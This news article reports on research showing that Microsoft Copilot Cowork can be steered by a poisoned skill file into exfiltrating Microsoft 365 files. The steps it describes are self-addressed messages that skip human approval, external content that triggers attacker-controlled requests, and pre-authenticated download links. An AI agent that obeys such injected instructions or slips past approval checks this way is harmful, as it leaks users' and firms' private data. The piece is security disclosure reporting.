Microsoft Copilot Cowork can be tricked into exfiltrating sensitive files, report says
Microsoft Copilot Cowork faces file-exfiltration risk
A new report says Microsoft Copilot Cowork can be manipulated into leaking sensitive files from Microsoft 365 through indirect prompt injection, exposing enterprises to a significant security risk.
The finding centers on insecure automatic action approvals for sending emails and Teams messages. According to the report, Copilot Cowork can be steered by a poisoned skill file containing prompt injection instructions, allowing an attacker to exfiltrate data from a victim’s Microsoft tenant using the agent’s own permissions and Microsoft Graph access.
Copilot Cowork is a Frontier feature in Microsoft 365 that operates with a user’s Microsoft permissions and can read and act on data across the tenant. The researchers say the attack worked at a high success rate even against state-of-the-art models, including Claude Opus 4.7.
How the attack works
Microsoft’s documentation says Copilot Cowork asks for permission before taking sensitive actions such as sending email or posting in Teams. But the report says that in practice, messages sent to the active user execute immediately without human approval. Users also cannot change that behavior.
That creates a path for exfiltration: a compromised message can include external images or other content that triggers network requests when opened in Outlook or Teams, allowing attacker-controlled requests to fire. The report says Copilot Cowork can also retrieve pre-authenticated download links for files the user can access, and those links can be used to download the file by anyone who receives them.
The victim scenario described in the report involves a user with access to SharePoint or OneDrive files containing PII and financial data, then uploading a skill file to Copilot Cowork that carries the injected prompt.
Broader enterprise exposure
Protect your privacy with Doppler VPN
3-day free trial. No registration. No logs.
The researchers say the issue is not limited to one injection source. Similar attacks could come from web data in tools like Claude for Chrome or from connected MCP servers. They argue the risk reflects a broader problem: giving agents access to multiple systems expands the prompt-injection attack surface, even when each individual capability appears benign in isolation.
Separate from the exfiltration path through messages, the researchers say they also disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.
Sources:
Browse privately with Doppler VPN — no logs, one tap connect.